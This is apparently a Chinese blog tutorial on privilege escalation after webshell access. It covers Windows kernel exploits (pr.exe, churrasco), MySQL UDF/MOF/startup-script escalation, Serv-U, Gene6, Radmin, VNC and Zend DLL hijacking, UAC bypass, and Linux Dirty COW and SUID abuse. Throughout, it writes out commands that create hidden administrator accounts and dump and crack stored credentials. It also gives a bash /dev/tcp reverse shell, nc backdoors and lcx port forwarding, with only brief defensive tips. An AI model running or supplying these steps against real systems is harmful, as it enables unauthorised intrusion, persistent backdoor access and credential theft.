17.提权

提权方法:
溢出漏洞提权、数据库提权(mysql提权(udf提权,mof提权,自启动提权)、mssql提权)、第三方软件提权(serv-u、flashFxp、genne6 Ftp、vnc、radmin 、 zend、dll劫持、perl、cacle、pcanyWhre等)

windows提权(sc提权、不带引号的服务路径[在文件夹名称带空格的文件夹下放一个msf木马,进行shell反弹]、不安全的服务权限、)、linux提权(脏牛提权、suid提权)

数据库脱库可以使用工具 通过百度查找Navicat Mysql、Navicat for SQL Server、Navicat for Oracle、Navicat for PostgreSQL、Navicat for SQLite等,也可以使用其它工具代替,如sqlmap、k8等类似工具。

2 提权

2.1 溢出漏洞提权

溢出漏洞的全名:缓冲区溢出漏洞 因为它是在程序执行的时候在缓冲区执行的[错误代码]。所以叫缓冲区溢出漏洞。

cmd.exe执行命令时需要读取和写入权限,且需要授予iuser权限。默认只有读取的权限。
上传大马或者菜刀使用cmd时,无法成功执行命令,
原因可能是运维人员把cmd的权限进行了调低。只有管理员有写入权限。

如何解决:
使用大马或菜刀,查看哪些目录具有写入权限(不能找带空格的目录),上传一个cmd.exe到目录,并设置新的终端路径: setp c:\xxx\cmd.exe ,这样就使用新的cmd.exe执行命令。

提权常用的命令有:

whoami ——查看用户权限
systeminfo ——查看操作系统,补丁情况
ipconfig——查看当前服务器IP ipconfig /all
net user——查看当前用户情况
netstat ——查看当前网络连接情况  netstat –ano  /netstat –an | find “ESTABLISHED”
tasklist ——查看当前进程情况 tasklist /svc 
taskkill ——结束进程 taskkill -PID xx
net start  ——启动服务
net stop ——停止服务


net user best 123456 /add 添加用户名为best,密码为123456
net localgroup administrators best /add 将用户名为best的用户添加到管理员组
net user best /del 删除best用户

快速查找未打补丁的 exp,可以最安全的减少目标机的未知错误,以免影响业务。 命令行下执行检测未打补丁的命令如下:

systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt

image.png

可以去下面的网址去下载对应的exploits:
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/WindowsExploits/Exploits
https://github.com/AusJock/Privilege-Escalation

2003系统比较出名的提权是巴黎烤肉提权、pr提权(ms-09-012)

2.1.1 pr.exe提权

Windows Server 2003和windows xp系统能够使用 pr 提权。如果目标机打上了 KB952004补丁 的话,是没有办法使用pr进行提权的。
1.将pr.exe上传。
2.运行pr.exe,并使用命令添加账户并添加到管理原组。

pr.exe "net user hack 123 /add"   #新建一个hack用户,密码为 123
pr.exe "net localgroup administrators hack /add" #将hack用户加入administrators管理员组

3.就可以用远程桌面登录了,前提是目标主机开启了3389远程端口。
也可以使用pr.exe后接工具开启3389端口。

pr.exe "opents.exe"

2.1.2 巴西烤肉漏洞

churrasco.exe是2003系统一个本地提权漏洞,通过此工具可以以SYSTEM权限执行命令,从而可以达到添加用户的目的。
1.上传churrasco.exe
2.在命令行直接输入命令,添加账号
D:\churrasc.exe "net user"

image.png

溢出漏洞防范方法:打补丁。

2.2 数据库提权

2.2.1 mysql提权

mysql提权的前提条件是获取mysql账号,密码。以及是否有远程访问权限。
1.如何获取mysql账号,密码
方法一:
webshell查看网站配置文件。
如:conn、config、data、sql、common 、inc等。

方法二:
查看数据库安装路径下的mysql文件 安装目录为/data/mysql/user.myd和user.myi

方法三:
通过暴力破解得到(hscan、Bruter、hydra、脚本木马)

注意事项:
一、基于安全考虑root账户一般只能本地访问,但是在开发过程中可能需要打开root的远程访问权限。下面是基本的步骤:
1、登录到mysql中,为root进行远程访问的授权,执行下面的命令:

mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
mysql> flush privileges;

第一句中"%"表示任何主机都可以远程登录到该服务器上访问。
如果要限制只有某台机器可以访问,将其换成相应的IP即可,

GRANT ALL PRIVILEGES ON *.* TO root@“%" IDENTIFIED BY "root";

第二句表示从mysql数据库的grant表中重新加载权限数据。因为MySQL把权限都放在了cache中,所以在做完更改后需要重新加载。

二、mysql数据库密码保存文件
参考:http://blog.sina.com.cn/s/blog_8028ba2f0100rzpt.html

三、菜刀数据库连接、大马777.php、其它工具爆破
不推荐脚本,速度慢。

2.2.1.1 udf提权

1.可以使用工具mysql综合利用工具。
需要输入ip,数据库密码,以及导入的目录(如果是手工安装的mysql:默认目录是c:\windows\system32\udf.dll;如果是phpstudy集成环境,则需要在安装目录下的mysql/lib目录下创建plugin文件夹。
目录是:)


image.png

2.执行SQL,打开3389端口,添加用户等。
添加用户:
select cmdshell('net user 11 test /add');


image.png

打开3389端口:
Create Function open3389 returns string soname 'udf.dll';
select open3389();
image.png

3.我们也可以使用上传moon.php大马来进行连接。

2.2.1.2 mof提权

1.可以使用工具,创建账户会5分钟创建一个,且删除会再生。


image.png

2.使用菜刀上传文件moon.mof,这个文件是创建一个admin账号。
并执行命令:

select load_file('C:\\wmpub\\moon.mof') into dumpfile 'c:/windows/system32/wbem/mof/moon.mof';

2.2.1.3 mysql启动项提权

1、通过mysql数据库命令写入VBS脚本;

2、直接通过Webshell的Mysql写入启动项;

3、通过MS12-020、MS15-034重启服务器。

C:\php\MySQL-5.1.50\bin>mysql -uroot -proot -h192.168.1.109
mysql>drop database test1;
mysql> create database test1;
mysql> use test1;
mysql> create table a (cmd text);
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"")");
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user best best /add"",0)");
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators best /add"",0)");
注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!
mysql>select * from a;
mysql>select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//best.vbs";

最后通过溢出漏洞让服务器重启,如:MS12-020、MS15-034


2.2.2 mssql提取

溢出漏洞是针对server 2000,2000之后的版本很少有。目前主要是通过弱口令直接提权。

1.可以使用工具其他工具--sql链接--sqltools2.0.


image.png

2.2.3 安全防御

1、限止数据库远程连接,给数据库帐户设置密码必须>8位以上并数字+字母+特殊符号等。

2、不要给网站配置root或SA权限。必须给每个网站独立分配数据库帐户并限格控制好权限。

3、及时升级数据库补丁。

4、安装Waf进行防御。
5、购买数据库审计设备

2.3 第三方提权

2.3.1 serv-u提权

存在漏洞的地方:
1.5.04以下版本可用servux.exe进行远程溢出漏洞。
2.权限配置不当可用svu.exe添加管理员账号。添加命令:
** svu.exe -i ip地址 -u 用户 -p 密码 -a 路径**
3.serv-u目录文件存在修改权限,直接修改配置文件添加管理用户。
4.serv-u目录文件不存在修改权限,可直接通过serv-u默认本地管理员提权。

2.3.1.1 安装配置serv.exe

1.安装并破解serv.exe。
双击setup.exe(汉化包),路径选择serv.exe的安装路径。


image.png

破解:
运行patch.exe。


image.png
  1. 打开serv.exe,并进行配置域。新建域,ip动态可不填,一切默认。


    image.png

    新建用户,创建用户名,密码等等。


    image.png

    给与新建的test账号系统管理员权限,并且设置目录访问权限。
    image.png

2.3.1.2 提权

方法一:运行大马,使用大马中的serv-u提取功能进行提权,服务端口号为:43958(也可以使用端口扫描查看是否开启了serv-u.exe)
这个方法是添加了一个隐藏的管理员账号。

image.png

方法二:
1.创建的用户信息保存在安装目录下的Serv-U\ServUDaemon.ini中。


image.png
image.png

在serv-u的客户端刷新一下,可以查看添加的test1。


image.png

2.在物理机的cmd.exe上可以访问ftp,进行添加账户。
在ftp命令行中添加账号的命令为:

quote site exec net user best666 best /add
quote site exec net localgroup administrators best666 /add
image.png

image.png

2.3.2 FlashFxp提权

渗透测试人员只需下载quick.dat、sites.dat、stats.dat这三个文件进行本
地替换,就可以获取登录密码。
1.安装flashfxp之后,查看站点,密码可以使用星号密码克星软件进行查看。


image.png

2.3.3 Gene6 ftp提权

2.3.3.1 genne6 安装

1.安装fenne6,设置登录密码,并进行汉化。汉化时要把垃圾软件取消勾选。默认安装路径是C:\Program Files\Gene6 FTP Server


image.png

语言选择中文。


image.png

2.主配置文件是Remote.ini,其路径是
C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini。管理员登录的ip、端口和密码都存储在这。但Gene

6管理员帐号只充许本地登录。 只能通过Webshell转发端口才可以进行远程连接。


image.png

2.3.3.2 提权

1.使用菜刀上传工具lcx.exe
使用命令
lcx.exe –tran 600 127.0.0.1 8021 进行端口转发。


image.png

2.在win7系统上也安装genne6,并新建连接,输入目标ip和转发的端口600.


image.png

3.对win7电脑上的genne6进行设置,新建域名,并选择侦听的ip为192.168.60.102


image.png

在ftp命令模式下使用quote site 123 可以运行cmd.exe


image.png

新建用户:


image.png

设置用户的权限:
image.png

4.可以在win2003的系统上看到在win7系统上新添加的用户test1。

2.3.4 PcanyWhere提权

使用的端口是5631,5632.

1.该软件的默认安装路径为C:\Program Files\Symantec\pcAnywhere\

*.cif文件默认路径为C:\DocumentS and Settings\All Users\ApplicationData\Symantec\pcAnywhere\Hosts\

2.使用webshell下载*.cif文件,使用PCAnyPass.exe破解密码。

image.png
  1. 在另一台电脑上安装 PcanyWhere软件,创建连接,输入账号密码。

2.3.5 Vnc提权

vnc的端口是5900/5800,可以使用端口扫描来判断是否安装此软件。
1.vnc的密码是保存在
注册表中,可以在命令行输入命令cmd /c "regedit /e c:\123.reg"HKEY_LOCAL_MACHINE\software\RealVNC\WinVNC4" ",将信1息保存为123.reg。
可以使用软件vncx4.exe进行破解。

image.png

2.3.6 Radmin提权

2.3.6.1 Radmin安装设置

1.安装Radmin,将软件包中的server.exe和和admdll.dll放在vm里面,cmd下运行server.exe /setup 设置密码及输入注册信息。也可以设置图标隐藏。


image.png
image.png

2.在物理机上运行radmin.exe控制虚拟机的设备。


image.png

可以使用以下功能:


image.png

2.3.6.2提权

通过上传的大马的功能radmin读取hash或者是注册表读取hash值进而控制虚拟机。
1.大马读取出的hash值密码需要转换一下大小写,将大写字母转换成小写。


image.png

2.注册表读取需要使用命令:

cmd /c "regedit /e c:\123.reg "HKEY_LOCAL_MACHINE\system\RAdmin\v2.0\Server\Parameters""
image.png

3.使用hash做为密码时需要使用Radmin_Hash.exe软件。


image.png

2.3.7 Zend 提权

phpstudy默认集成了zend,其路径是:安装目录\php-5.2.17\ZendOptimizer。

1.通过webshell对原ZendExtensionManager.dll重命名,同时上传nc.exe(瑞士军刀)和cmd.exe。


image.png

2.在物理机打开Zend_DLL_Hijacking_for_nc.exe软件,进行配置。通过工具重新生成一个来木马ZendExtensionManager.dll让apche重启加载。
3、等apache重新加载,如果没有加载可以手工重启apache加载
4、telnet ip 1111登录目录服务器


image.png

2.3.8 DII劫持提权

要求:目录可读可写,目录下有exe文件。

1.使用工具T00ls Lpk Sethc v4.0.exe生成LPK.dll文件,使用webshell上传到一个可读可写,目录下有exe文件的目录。


image.png

2.运行目录下的exe文件,然后重启电脑。在登陆页面先按5次shift建,之后再同时按下ab键,输入密码,就实现了dll劫持。


image.png

image.png

2.3.9 Windows空格、服务、漏洞提权

2.3.10 perl与cacls提权

1.cacls提权,使用命令:
cacls c:\index.asp /t /e /c /g interactive:f
把index.asp加入interactive组并赋予完全控制权限(IIS的IUSER_用户就在这一组中).这样就可以对index.asp任意编辑。

Cacls filename [/T] [/E] [/C] [/G usererm] [/R user [...]] [/P usererm [...]] [/D user [...]]
Filename:显示访问控制列表(以下简称ACL)


/T:更改当前目录及其所有子目录中指定文件的ACL
/E:编辑ACL而不替换
/C:在出现拒绝访问错误时继续 
/G Userer:perm:赋予指定用户访问权限,Perm代表不同级别的访问权限,其值可以是R(读取)、W(写入)、C(更改,写入)、F(完全控制)等。
/R user:撤销指定用户的访问权限,注意该参数仅在与“/E”一起使用时有效。
/P user:perm:替换指定用户的访问权限,perm的含义同前,但增加了“N(无)”的选项。
/D user:拒绝指定用户的访问

image.png

3 windows提权

uac:是windows的安全机制。(2003版本没有)

当前获得的权限是存在于管理员组的时候但是并且是administrator这个用户,此时就可能需要我们进行绕过UAC的操作,否则虽然是管理员组但是实际上并没有管理员所对应的高权限操作,这个时候就需要bypass uac。

3.1 使用木马提权

1.在win7新添加一个用户,新添加的用户默认属于user组。并切换到新加用户的模式下。


image.png

image.png

2.用kali生成payload.exe并下载下来上传至win7系统。在win7运行建立会话。


image.png
image.png

3.使用getuid查看当前权限,使用getsystem进行提权。


image.png

这个情况下我们需要bypass uac。

方法一:
使用use exploit/windows/local/ask这个payload。设置信息。

或者使用use exploit/windows/local/bypassuac或者
use exploit/windows/local/bypassuac_injection

image.png

image.png

方法二:
使用漏洞提权:
使用ms11-080漏洞。


image.png

3.2 不带引号的服务路径

参考:https://www.cnblogs.com/persuit/p/5916010.html

windows服务运行时,如果有可执行文件且有完整路径,系统会按照字面解释执行。如果路径没有被包括在"(引号)中,操作系统就会找含有空格路径下的第一个实例。

根据这个漏洞,我们可以上传木马,然后漏洞特性造成开机自启动。(上传之后需要重启)。

1.使用命令查找带空格的目录:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

如果在cmd.exe下不能运行wmic,是环境变量没有进行配置。在path变量后添加C:\Windows\System32\wbem就可以
2.将exe文件放在c:根目录下,重启电脑,看是否开机自启。

3.3 sc 命令提权(adminstrator----system)

SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中的“服务”。
主要使用的命令有;
sc Create syscmd binPath= “cmd /K start” type= own type= interact
//创建一个名叫syscmd的新的交互式的cmd服务,/k是启动后窗口不消失。\c是消失

sc start systcmd //启动新建cmd服务


image.png

3.2 linux提权

linux内核版本由3组数字组成,
第一个数字是目前发布的内核主板本,
第二个数字:偶数表示稳定版本,奇数表示开发中版本。
第三个数字代表错误的修补次数。
查看内核版本:uname -a
查看发行版本:cat /etc/issue
cat /etc/*-release

3.2.1 反弹shell

使用的工具是netcat(nc),瑞士军刀。
1.在kali上使用nc模块,开启监听端口


image.png

2.在物理机上连接kali主机。
nc在目录tools --提权工具--nc。

3.2.2 bash直接反弹

Linux中一般默认的shell是bash,它功能几乎可以涵盖shell所具有的功能,所以一般的shell脚本都会指定它为执行路径。

常用的参数有:
bash -i :生成一个bash交互环境。

/dev/tcp/目标ip/端口: /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。这个命令是让主机与目标主机建立一个tcp连接。

&:将联合符号前面的内容和后面相结合然后一起重定向给后者。

0>&1:将标准的输入与标准的输出内容结合,然后重定向给后面标准输出的内容。

linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:

0 - stdin 代表标准输入,使用<或<<
1 - stdout 代表标准输出,使用>或>>
2 - stderr 代表标准错误输出,使用2>或2>>
当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符

具体内容参考:https://blog.csdn.net/Auuuuuuuu/article/details/89059176?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param

https://www.cnblogs.com/yyxianren/p/12665816.html

1.在kuli系统输入命令:
bash -i >& /dev/tcp/物理机ip/端口
2.使用nc.exe软件,输入nc.exe -l -p 端口号


image.png

3.2.1.脏牛提权

影响范围:linux内核>=2.6.22
原理:关键函数使是get_user_pages,Copy_on_Write(cow)。
get_user_pag内核函数在处理cow的过程中,产生了竞争造成了cow过程被破坏。
复制只读页生成了一个带有写权限的新页。

1.下载POC:https://github.com/FireFart/dirtycow

2.利用gcc编译dirty.c文件

gcc -pthread dirty.c -o dirty -lcrypt


image.png

image.png

[图片上传中...(image.png-b1e76d-1598536884397-0)]


image.png

3.2 suid提权

SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者(普通用户)暂时获得该文件拥有者的权限。
suid提权:
大概意思就是就是有个文件,它有s标志,并且他属主是root,普通用户运行这个程序就可以暂时有了root的权限,并且这个程序还得能执行命令。

文件权限查询:
      # ll f1
      -rwsr-xr-x. 1 root root 0 Nov 17 20:18 f1
   文件属主的x权限,用s代替.表示被设置了SUID

如果属主位没有x权限,会显示为大写S,表示有故障(权限无效)

1.首先在本地查找符合条件的文件,有以下三个命令

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
image.png

列出来的所有文件都是以root用户权限来执行的,接下来找到可以提权的文件

常用的可用于suid提权的文件
Nmap
Vim
find
Bash
More
Less
Nano
cp

namp(2.02-5.21)有交互模式,可以允许执行shell命令。

如果支持交互的话,可以使用下命令进入namp交互模式
nmap --interactive
执行命令后会返回一个shell
nmap> !sh
sh-3.2# whoami
root

3.3 使用已对外公开的exp

已对外公开 exp 注:

https://github.com/SecWiki/linux-kernel-exploits https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/ https://github.com/xairy/kernel-exploits

3.4 linux常用命令

1.内核,操作系统和设备信息
uname -a 打印所有可用的系统信息
uname -r 内核版本
uname -n 系统主机名。
uname -m 查看系统内核架构(64位/32位)
hostname 系统主机名
cat /proc/version 内核信息
cat /etc/*-release 分发信息
cat /etc/issue 分发信息
cat /proc/cpuinfo CPU信息

2.用户和权限信息:

whoami        当前用户名
id            当前用户信息
cat /etc/sudoers  谁被允许以root身份执行
sudo -l       当前用户可以以root身份执行操作

3.linux一句话添加账号

(1)chpasswd 方法
# useradd guest;echo 'guest:123456'|chpasswd
(2)useradd -p 方法
# useradd -p `openssl passwd 123456` guest
(3)echo -e 方法
# useradd test;echo -e "123456n123456n" |passwd test

(6)其它

Linux运维最常用150个命令](https://www.jianshu.com/p/979d8f5e5e65)

vim必知必会的快捷键

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 158,736评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,167评论 1 291
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,442评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,902评论 0 204
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,302评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,573评论 1 216
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,847评论 2 312
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,562评论 0 197
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,260评论 1 241
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,531评论 2 245
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,021评论 1 258
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,367评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,016评论 3 235
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,068评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,827评论 0 194
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,610评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,514评论 2 269